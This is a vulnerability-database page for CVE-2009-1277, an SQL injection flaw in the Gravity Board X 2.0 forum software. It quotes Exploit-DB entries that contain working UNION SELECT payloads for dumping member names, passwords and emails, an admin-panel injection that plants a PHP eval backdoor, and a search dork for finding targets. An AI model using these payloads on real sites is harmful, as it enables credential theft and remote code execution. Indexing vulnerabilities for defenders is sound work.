CVE-2009-1277
published 2009-04-09CVE-2009-1277: SQL injection vulnerability in index.php in Gravity Board X (GBX) 2.0 BETA allows remote attackers to execute arbitrary SQL commands via the member_id…
PriorityP339high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
0.97%
57.6th percentile
SQL injection vulnerability in index.php in Gravity Board X (GBX) 2.0 BETA allows remote attackers to execute arbitrary SQL commands via the member_id parameter in a viewprofile action. NOTE: the board_id issue is already covered by CVE-2008-2996.2.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| gravityboardx | gravity_board_x | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Gravity Board X 2.0 Beta - SQL Injection / (Authenticated) Code Execution
exploitdb·2009-04-03
CVE-2009-1278 Gravity Board X 2.0 Beta - SQL Injection / (Authenticated) Code Execution
Gravity Board X 2.0 Beta - SQL Injection / (Authenticated) Code Execution
---
Found : brain[pillow]
Dork : "Powered By Gravity Board X v2.0 BETA"
Visit : brainpillow.cc, forum.antichat.ru, raz0r.name
Mail : [email protected]
SQL-injections:
/index.php?action=viewprofile&member_id=slider-loleg'+union+select+concat_ws(char(58),displayname,pw,email)+from+gbx_members+where+1='1
/index.php?action=viewboard&board_id=m0nzt3r-loleg-too'+union+select+0,concat_ws(char(58),displayname,pw,email),2+from+gbx_members+where+1='1
Code exec (in admin panel):
Go: /index.php?action=configure
Enter Board Name: xXx";if(isset($_GET[c]))eval($_GET[c]);#
Go: /index.php?ok=phpinfo();
# milw0rm.com [2009-04-03]
Exploit-DB
Gravity Board X 2.0 Beta - SQL Injection / Cross-Site Scripting
exploitdb·2008-06-12
CVE-2009-1277 Gravity Board X 2.0 Beta - SQL Injection / Cross-Site Scripting
Gravity Board X 2.0 Beta - SQL Injection / Cross-Site Scripting
---
Gravity Board X 2.0 Beta (SQL/XSS) Multiple Remote Vulnerabilities
,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..
`+---------------------------^----------|
`\_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'
AUTHOR : CWH Underground
DATE : 12 June 2008
SITE : www.citec.us
#####################################################
APPLICATION : Gravity Board X
VERSION : 2.0 Beta
DOWNLOAD : http://downloads.sourceforge.net/gbx
#####################################################
+++ Remote Stored XSS Exploit +++
When you create new thread in forum, you can inject javascript in title fie
No writeups or analysis indexed.
2009-04-09
Published